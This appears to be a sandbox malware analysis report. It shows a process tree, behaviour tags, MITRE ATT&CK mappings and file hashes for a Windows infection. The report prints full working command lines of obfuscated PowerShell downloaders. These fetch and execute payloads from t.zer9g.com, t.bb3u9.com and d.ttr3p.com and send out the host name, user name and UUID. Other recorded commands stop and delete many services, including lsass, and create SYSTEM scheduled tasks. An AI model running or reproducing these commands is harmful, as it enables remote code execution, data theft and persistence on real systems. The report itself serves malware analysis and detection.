C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5072

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&MKLUFVRL^^^&00000000-0000-0000-0000-000000000000^^^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|ye9zMSruN.exe -
2⤵
- Suspicious use of WriteProcessMemory
PID:4560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^&MKLUFVRL^&00000000-0000-0000-0000-000000000000^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"
3⤵
PID:4728

C:\Windows\System32\WindowsPowerShell\v1.0\ye9zMSruN.exe
ye9zMSruN.exe -
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4732

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&MKLUFVRL^^^&00000000-0000-0000-0000-000000000000^^^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|ye9zMSruN.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe
2⤵
PID:4608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^&MKLUFVRL^&00000000-0000-0000-0000-000000000000^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^|Get-Random -Count 100));test1 -PEBytes $bin"
3⤵
PID:4764

C:\Windows\System32\WindowsPowerShell\v1.0\ye9zMSruN.exe
ye9zMSruN.exe -
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4844

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&MKLUFVRL^^^&00000000-0000-0000-0000-000000000000^^^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|ye9zMSruN.exe -
2⤵
PID:4632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^&MKLUFVRL^&00000000-0000-0000-0000-000000000000^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"
3⤵
PID:2696

C:\Windows\System32\WindowsPowerShell\v1.0\ye9zMSruN.exe
ye9zMSruN.exe -
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5016

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\rx3ve1h3\rx3ve1h3.cmdline"
4⤵
PID:2844

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES668B.tmp" "c:\Windows\Temp\rx3ve1h3\CSC7F4257F2AD9C4DEDBEA0412255FCB45.TMP"
5⤵
PID:3660

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config xWinWpdSrv Start= Disabled
4⤵
PID:2188

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop xWinWpdSrv
4⤵
PID:3436

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete xWinWpdSrv
4⤵
PID:756

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config SVSHost Start= Disabled
4⤵
PID:644

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop SVSHost
4⤵
PID:1740

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete SVSHost
4⤵
PID:4264

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config "Microsoft Telemetry" Start= Disabled
4⤵
PID:800

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop "Microsoft Telemetry"
4⤵
PID:652

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete "Microsoft Telemetry"
4⤵
PID:4444

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config lsass Start= Disabled
4⤵
PID:1136

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop lsass
4⤵
PID:1032

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete lsass
4⤵
PID:4148

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Microsoft Start= Disabled
4⤵
PID:2068

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Microsoft
4⤵
PID:4356

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Microsoft
4⤵
PID:4460

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config system Start= Disabled
4⤵
PID:3056

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop system
4⤵
PID:5044

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete system
4⤵
PID:4136

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Oracleupdate Start= Disabled
4⤵
PID:2156

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Oracleupdate
4⤵
PID:4540

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Oracleupdate
4⤵
PID:4636

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config CLR Start= Disabled
4⤵
PID:4924

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop CLR
4⤵
PID:4476

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete CLR
4⤵
PID:4548

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config sysmgt Start= Disabled
4⤵
PID:2820

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop sysmgt
4⤵
PID:4484

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete sysmgt
4⤵
PID:3972

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config \gm Start= Disabled
4⤵
PID:2780

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop \gm
4⤵
PID:4308

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete \gm
4⤵
PID:4412

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WmdnPnSN Start= Disabled
4⤵
PID:1040

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WmdnPnSN
4⤵
PID:3076

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WmdnPnSN
4⤵
PID:3948

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Sougoudl Start= Disabled
4⤵
PID:4496

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Sougoudl
4⤵
PID:4772

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Sougoudl
4⤵
PID:2728

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config National Start= Disabled
4⤵
PID:5024

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop National
4⤵
PID:4564

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete National
4⤵
PID:2476

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationaaal Start= Disabled
4⤵
PID:4188

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationaaal
4⤵
PID:1496

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationaaal
4⤵
PID:948

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Natimmonal Start= Disabled
4⤵
PID:3660

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Natimmonal
4⤵
PID:2844

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Natimmonal
4⤵
PID:3688

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationaloll Start= Disabled
4⤵
PID:2832

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationaloll
4⤵
PID:1164

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationaloll
4⤵
PID:2472

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationalmll Start= Disabled
4⤵
PID:804

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationalmll
4⤵
PID:4116

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationalmll
4⤵
PID:4156

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationalaie Start= Disabled
4⤵
PID:4376

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationalaie
4⤵
PID:4152

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationalaie
4⤵
PID:1292

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationalwpi Start= Disabled
4⤵
PID:4900

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationalwpi
4⤵
PID:5036

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationalwpi
4⤵
PID:4148

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinHelp32 Start= Disabled
4⤵
PID:644

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinHelp32
4⤵
PID:1740

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinHelp32
4⤵
PID:4460

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinHelp64 Start= Disabled
4⤵
PID:2156

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinHelp64
4⤵
PID:800

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinHelp64
4⤵
PID:4356

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Samserver Start= Disabled
4⤵
PID:4420

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Samserver
4⤵
PID:4416

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Samserver
4⤵
PID:1460

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config RpcEptManger Start= Disabled
4⤵
PID:3788

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop RpcEptManger
4⤵
PID:1528

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete RpcEptManger
4⤵
PID:1324

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config "NetMsmqActiv Media NVIDIA" Start= Disabled
4⤵
PID:2804

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop "NetMsmqActiv Media NVIDIA"
4⤵
PID:3336

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete "NetMsmqActiv Media NVIDIA"
4⤵
PID:4224

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config "Sncryption Media Playeq" Start= Disabled
4⤵
PID:4660

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn t.bb3u9.com /F /tr t.bb3u9.com
2⤵
- Creates scheduled task(s)
PID:3780

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \pMVZHfUeNq /F /tr "powershell -c PS_CMD"
2⤵
- Creates scheduled task(s)
PID:2156

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn \pMVZHfUeNq
2⤵
PID:1264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
1⤵
- Blocklisted process makes network request
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4976

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4976 -s 2548
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:2748

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?rep_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
1⤵
PID:4532

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
d737fc27bbf2f3bd19d1706af83dbe3f

SHA1
212d219394124968b50769c371121a577d973985

SHA256
b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

SHA512
974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

Download Submit
C:\Windows\System32\WindowsPowerShell\v1.0\ye9zMSruN.exe
MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\System32\WindowsPowerShell\v1.0\ye9zMSruN.exe
MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\System32\WindowsPowerShell\v1.0\ye9zMSruN.exe
MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\TEMP\RES668B.tmp
MD5
f7fbb70c122d1ec88bf0abc7ab43758d

SHA1
1aaa74d706b981b5a2d35e744c992f4c8e7117de

SHA256
8649c2d8ed4af7264e14baed7d294b7b3ac8963e47f6cb547d23df766a756a4d

SHA512
6d730f341c3215ac2bfeb5090a2be566390e32b208912c190481e5d82cbaf073f479ea908b45e64c7c733cf230c5733b76c911bb7d95ac74486f1b2f0a5e8b06

Download Submit
C:\Windows\TEMP\rx3ve1h3\rx3ve1h3.dll
MD5
4055b805268424b982cb119496fd42b4

SHA1
0f7b9d4e30fe5711dc9c830feed7a13e4ab683da

SHA256
e11f171a9deeed74afe2c09ac490edc613df1d3206539d0925fb0b5111543589

SHA512
0be640ce0c657560c38f97f41ac0b3a38c3ec7b9feca1bb6fe9700aedcc0b4dc225f7e4edb2e04a1912e0bebb2330957be870583721e1ca60b2494c53d9a8c19

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
5f5aa607657efd596f2ba27625bb7ed4

SHA1
6818e799afcb486fa9416eb29468c10f7a051d88

SHA256
f5a8fbb9d69c35df83b4721a580777a6d7f748965b8db902257a73a2d48b787b

SHA512
0b6d87751aaa6da840f932e718d1444e0b7d033f3eecfac988a9b9e4266370d852d7a5f28d65526968807fe56018902c0a6c1ac876a276efce876aebb57fa93b

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
fbee00510eb47c7fb0a7771e53a0f185

SHA1
ccfb5ed960451945bb293ad6ec7b42438f0d8cfd

SHA256
6c73b617fd2e57baf3955d7b4842190ab1ce1112c029c0ce6463783deb0d1ff5

SHA512
a85344fce4a41244852b4a04f04945cd20f26d88120e97c1abd672ab4b6aae359c18d9e1d0bea41e22fa63c19c2d7981ef65b5f893e0f447259d8dc03f371787

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
f92bbe1907577f64bb8099b63bb7bbf3

SHA1
88bd6b9782e457741dadb7d9101de21336cbece9

SHA256
a05e6d139f22b5a4435bb3412836c2cc1e970d6f3e9919a8bc6f1a21d147d02c

SHA512
32b562a4d4a46615c095abe4a8e5fc8b6f607850a04ce7e71de97a9e5c4c3bd0a1f0c93d306ebd353a507be0c341d777a7e623178bc03d71218365929c789be3

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
0d6cf36fd1365f5e0f3613e036e67b08

SHA1
a69cfe08860abf74eeb3061de7e94e078f0e7476

SHA256
34be5be9fb158824e365d0e8a45624d8becaaeb7ad89f41d260593324f6b9231

SHA512
aa1c7479e4fc4e4bde3dcd905cafb4f220662a2fc5e295fe9afe6b83b37f5149cffd973291cf619f4c008418a007685e3e2f2188a758a0fcf302a0549eee6f8d

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
0f9ce9a5d0a320223c80462d2e228bc7

SHA1
7bbeda6d81d00592083f7e7943912d8e824c92fd

SHA256
887664b1cd8013d5c4917e6a4e1b295e9bc9d15f57eeb8d06801b548e48c42fa

SHA512
45aadffdff25de5a7c02a26637c820761d4e0a0f5b4f5ff88778094df9a72f0f97ae301c59b3f5c780bd1d263b6cd9069c0f50b410f58a8d9783a0b9a4a61676

Download Submit
\??\c:\Windows\Temp\rx3ve1h3\CSC7F4257F2AD9C4DEDBEA0412255FCB45.TMP
MD5
6d9ebf10bcdb945a4914038e331fc27d

SHA1
7d4acb14a10a166d02fd8645a33356940f629df5

SHA256
96c3a2f4c04daf110fd6912179676b72a34b37b69a79346d7f4547b890845920

SHA512
1bed2b0a0fa08e8275a25e2af5bcc9d5ed6ace411dda3363568da869ff86bbb330db10aaf24e67ffc29c9791c52d5dcfd56e324888e7e4464922b60669cbc4c6

Download Submit
\??\c:\Windows\Temp\rx3ve1h3\rx3ve1h3.0.cs
MD5
a3d53d439e4e86639f5906a98406c007

SHA1
35a6bc37eaf0b5c644a080f1e3281d880514473d

SHA256
25ef21a1ac4c1bce799bb86569354494fb374a4c0e356a2af64cf99edfea7d49

SHA512
edd8785b0b001f1ee9d1314b4b16efa34471d6034a44d73173b87793037a137edd603a73cf471e852d49d94b8eedc7c53115d29a1064d911a096ffb5c56fe180

Download Submit
\??\c:\Windows\Temp\rx3ve1h3\rx3ve1h3.cmdline
MD5
c6e6c0158a4308cba1963d576d03716c

SHA1
d5f2465dd9322e302237724e0b27fd45cdbae2d9

SHA256
c7fe77fb743f3b3919e34dbb75935a0c76431b586cfa34e924325751d3cf35c5

SHA512
9152fefabdc4dfc13311cf78c0c1f3f32837804d4ad173b8478cffe7241fdc0f251efd89477d833be27af10442ca2a9284c8dc11ac43f2a263014e6dea86b991

Download Submit
memory/68-27-0x0000000000000000-mapping.dmp

Download
memory/200-11-0x0000000000000000-mapping.dmp

Download
memory/644-143-0x0000000000000000-mapping.dmp

Download
memory/652-147-0x0000000000000000-mapping.dmp

Download
memory/756-142-0x0000000000000000-mapping.dmp

Download
memory/800-146-0x0000000000000000-mapping.dmp

Download
memory/856-2-0x0000000000000000-mapping.dmp

Download
memory/1032-150-0x0000000000000000-mapping.dmp

Download
memory/1136-149-0x0000000000000000-mapping.dmp

Download
memory/1264-26-0x0000000000000000-mapping.dmp

Download
memory/1264-123-0x0000000000000000-mapping.dmp

Download
memory/1512-3-0x0000000000000000-mapping.dmp

Download
memory/1540-12-0x0000024FC6AC8000-0x0000024FC6ACA000-memory.dmp

Filesize
8KB

Download
memory/1540-10-0x0000024FC6AC6000-0x0000024FC6AC8000-memory.dmp

Filesize
8KB

Download
memory/1540-112-0x0000024FC6ACA000-0x0000024FC6ACF000-memory.dmp

Filesize
20KB

Download
memory/1540-9-0x0000024FC9660000-0x0000024FC9661000-memory.dmp

Filesize
4KB

Download
memory/1540-8-0x0000024FC6A20000-0x0000024FC6A21000-memory.dmp

Filesize
4KB

Download
memory/1540-6-0x0000024FC6AC0000-0x0000024FC6AC2000-memory.dmp

Filesize
8KB

Download
